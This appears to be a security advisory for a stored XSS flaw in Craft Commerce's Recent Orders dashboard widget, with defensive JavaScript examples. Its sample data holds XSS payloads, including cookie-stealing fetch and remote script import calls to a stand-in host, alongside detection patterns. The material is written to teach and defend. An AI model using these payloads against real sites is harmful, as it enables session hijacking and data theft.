CVE-2026-25482: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in craftcms commerce
CVE-2026-25482 is a stored, DOM-based Cross-Site Scripting (XSS) vulnerability affecting Craft Commerce versions 4.0.0-RC1 through 4.10.0 and 5.0.0 through 5.5.1. It arises from improper escaping of the Order Status Name in the "Recent Orders" dashboard widget, which builds its markup by JavaScript string concatenation.
AI Analysis
Technical Summary
CVE-2026-25482 is a stored, DOM-based Cross-Site Scripting (XSS) vulnerability in Craft Commerce, the ecommerce plugin for Craft CMS. The flaw sits in the "Recent Orders" dashboard widget, in the way the Order Status Name is rendered: the widget's JavaScript splices the name into markup by string concatenation instead of escaping it for the HTML context or inserting it as text. This improper neutralization of input (CWE-79) means that an attacker who can set an Order Status Name (order statuses are edited under Commerce's control panel settings, so this takes a privileged or compromised account) can store a payload that executes whenever another user with the widget on their dashboard views it. Because the payload runs in the victim's authenticated control panel session, it can read what that user can read and submit requests as that user, which can lead to session hijacking, privilege escalation, or other unauthorized actions within the admin interface. Affected versions are 4.0.0-RC1 through 4.10.0 and 5.0.0 through 5.5.1; the issue is fixed in 4.10.1 and 5.5.2 by escaping the value before it reaches the DOM. The CVSS 4.0 vector reported for the issue indicates a network attack vector, low attack complexity, privileges required (the attacker must be able to edit order statuses), user interaction required (a victim must view the widget), and high impact on confidentiality and integrity. No exploitation in the wild has been reported, but the administrative context in which the payload executes makes this a significant risk.
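The rendering pattern described above, shown as an added example that is not Craft Commerce's own code: a stand-in "Recent Orders" widget that concatenates an Order Status Name into HTML, beside two hardened versions (escape every interpolated value, or build DOM nodes and assign textContent). The order records, the status payload, the colour class names and the function names are all constructed for this example.

```javascript
// Added example, not Craft Commerce code: a stand-in "Recent Orders" widget
// showing the vulnerable pattern (stored value concatenated into HTML) and
// two hardened alternatives. All data below is constructed for the example.

// Sample records standing in for what the widget's data endpoint returns.
// The second status name is the kind of value an attacker who can edit
// order statuses could store; it is an illustrative payload, not a real one.
const SAMPLE_ORDERS = [
  { number: 'A1B2C3', status: 'Shipped', color: 'green' },
  { number: 'D4E5F6', status: '<img src=x onerror="alert(document.cookie)">', color: 'blue' },
];

// Vulnerable: the status name reaches the HTML parser unescaped, so a stored
// tag or attribute payload executes when this string is assigned to innerHTML.
function renderVulnerable(orders) {
  let html = '<table class="recent-orders">';
  for (const o of orders) {
    html += '<tr><td>' + o.number + '</td>' +
            '<td><span class="status ' + o.color + '">' + o.status + '</span></td></tr>';
  }
  return html + '</table>';
}

// Escaper for HTML text nodes and double-quoted attribute values. It covers
// the five characters that change meaning in those contexts plus the backtick,
// which older IE treated as an attribute delimiter.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Hardened (a): keep the concatenation but escape every interpolated value,
// including the ones that look harmless today (order number, colour class).
function renderEscaped(orders) {
  let html = '<table class="recent-orders">';
  for (const o of orders) {
    html += '<tr><td>' + escapeHtml(o.number) + '</td>' +
            '<td><span class="status ' + escapeHtml(o.color) + '">' +
            escapeHtml(o.status) + '</span></td></tr>';
  }
  return html + '</table>';
}

// Hardened (b), browser only: never hand the value to the HTML parser. Build
// elements and assign textContent, which stores the string as a text node no
// matter what characters it contains. `doc` is passed in (normally `document`).
function renderWithDom(orders, doc) {
  const table = doc.createElement('table');
  table.className = 'recent-orders';
  for (const o of orders) {
    const row = doc.createElement('tr');
    const numberCell = doc.createElement('td');
    numberCell.textContent = o.number;
    const statusCell = doc.createElement('td');
    const badge = doc.createElement('span');
    badge.className = 'status ' + o.color; // className is plain text, not markup
    badge.textContent = o.status;          // text node, never parsed as HTML
    statusCell.appendChild(badge);
    row.appendChild(numberCell);
    row.appendChild(statusCell);
    table.appendChild(row);
  }
  return table;
}

// Returns true if the rendered markup still contains the raw payload tag,
// i.e. the renderer under test is vulnerable to the stored value.
function leaksPayload(html) {
  return /<img\s[^>]*onerror=/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable leaks payload:', leaksPayload(renderVulnerable(SAMPLE_ORDERS)));
  console.log('escaped leaks payload:  ', leaksPayload(renderEscaped(SAMPLE_ORDERS)));
}
```

Run it with `node` to see the vulnerable renderer pass the payload through while the escaped one does not. Of the two fixes, the DOM-building variant is the more robust, because it removes the HTML parser from the path entirely; the escaping variant is what a minimal patch to existing concatenation code looks like and only stays safe as long as every interpolated value is escaped for the context it lands in (the attribute value and the text node here both tolerate the same escaper, but a value placed inside a `<script>` block or a URL would need a different one).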
Potential Impact
For European organizations running Craft Commerce within the affected version ranges, this vulnerability presents a risk of administrative account compromise and, through it, unauthorized control over ecommerce operations: theft of customer data, manipulation of order statuses, or insertion of fraudulent orders. Two roles are involved. The attacker must be able to set an Order Status Name, which in Craft Commerce is a privileged control panel operation, and the victim must be a control panel user who has the Recent Orders widget on their dashboard. The threat is therefore primarily internal, or comes from an attacker who has already compromised or socially engineered a privileged account and wants to extend that access to other administrators. The impact on confidentiality and integrity is high, since the injected script runs with the victim's session and can read what they can read and submit what they can submit. Availability impact is limited, though an attacker could break the dashboard for affected users. The medium CVSS score reflects the privileges and user interaction required, but the potential damage to ecommerce operations and customer trust is significant, and European businesses handling payment and customer data could face regulatory and reputational consequences if it were exploited.
Mitigation Recommendations
European organizations should upgrade Craft Commerce to 4.10.1 or 5.5.2 (or later) to apply the official fix. Until then, restrict control panel access to trusted personnel and enforce multi-factor authentication to reduce the chance of a privileged account being taken over. Consider a Content Security Policy for the control panel to limit what an injected script can do, but test it carefully: the control panel loads scripts of its own, so an over-strict policy can break it. Audit the stored Order Status Names for HTML metacharacters, quotes followed by attribute names, event-handler attributes or javascript: URLs; a legitimate status name has no reason to contain any of them, so a match is a strong indicator of attempted exploitation. Repeat this audit after upgrading as well: the patch escapes the value on render, so a payload that was already stored remains in the database and should be removed. Educate administrators about phishing and social engineering, monitor web server and application logs for unusual activity around the dashboard widget, and consider placing the control panel behind a VPN or IP allowlist. Finally, review JavaScript rendering in custom plugins and extensions for the same pattern (concatenating server-supplied values into markup) and replace it with context-aware escaping or textContent-based insertion.
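One way to run the audit of stored Order Status Names recommended above, as an added example that is not part of this page or of Craft Commerce: a scan that flags names carrying literal HTML tags, attribute-breaking quotes, javascript: URLs or entity-encoded metacharacters, and leaves an ordinary ampersand alone. The status records are constructed here; in a real audit they would come from the Commerce order status settings or the database, and the `id`, `handle` and `name` fields are the only assumptions made about their shape.

```javascript
// Added example, not Craft Commerce code: audit stored Order Status Names for
// content that has no business in a status label but would matter if the name
// were concatenated into markup. The records are constructed; only the `id`,
// `handle` and `name` fields are assumed about the real data's shape.
const SAMPLE_STATUSES = [
  { id: 1, handle: 'new', name: 'New' },
  { id: 2, handle: 'shipped', name: 'Shipped & Tracked' },          // legitimate ampersand
  { id: 3, handle: 'review', name: 'Review<svg/onload=fetch(`//x.example/`+document.cookie)>' },
  { id: 4, handle: 'hold', name: 'On hold" autofocus onfocus="import(\'//x.example/p.js\')' },
  { id: 5, handle: 'refunded', name: 'Refunded&#x3c;script&#x3e;' }, // entity-encoded brackets
  { id: 6, handle: 'link', name: 'Track: javascript:alert(1)' },
];

// Each check names the reason it fires. Order is from most to least decisive.
const CHECKS = [
  // A literal tag, with or without a closing bracket (browsers tolerate both).
  { reason: 'html-tag', re: /<\/?[a-z!?][^>]*>?/i },
  // A quote followed by an event-handler or URL-bearing attribute: the value is
  // trying to close the attribute it sits in and open a new one.
  { reason: 'attr-break', re: /["'][^"']*\s(on\w+|style|src|href)\s*=/i },
  // A javascript: URL, dangerous wherever the value ends up in an href/src.
  { reason: 'js-url', re: /javascript\s*:/i },
  // Entity- or hex-encoded metacharacters: harmless in a text node, but a sign
  // that someone probed how the value is decoded. A bare '&' does not fire this.
  { reason: 'encoded-metachar', re: /&(#x?[0-9a-f]+|lt|gt|quot|apos|amp);/i },
];

// Returns one finding per suspicious status, with every reason that matched,
// in the order the statuses were supplied.
function auditStatusNames(statuses) {
  const findings = [];
  for (const s of statuses) {
    const reasons = CHECKS.filter((c) => c.re.test(s.name)).map((c) => c.reason);
    if (reasons.length > 0) {
      findings.push({ id: s.id, handle: s.handle, name: s.name, reasons });
    }
  }
  return findings;
}

// Convenience for reporting: the handles that need a human to look at them.
function suspiciousHandles(statuses) {
  return auditStatusNames(statuses).map((f) => f.handle);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditStatusNames(SAMPLE_STATUSES)) {
    console.log(`status ${f.id} (${f.handle}): ${f.reasons.join(', ')} -> ${JSON.stringify(f.name)}`);
  }
}
```

The checks are deliberately broad rather than precise: a status name is a short human label, so any hit is worth a look, and the cost of a false positive is one manual review. Run the same scan again after upgrading, since the fix changes how the name is rendered, not what is stored.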
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-02-02T16:31:35.821Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69823eb3f9fa50a62fd8ce6e
Added to database: 2/3/2026, 6:30:11 PM
Last enriched: 2/11/2026, 11:59:52 AM
Last updated: 3/25/2026, 6:25:47 PM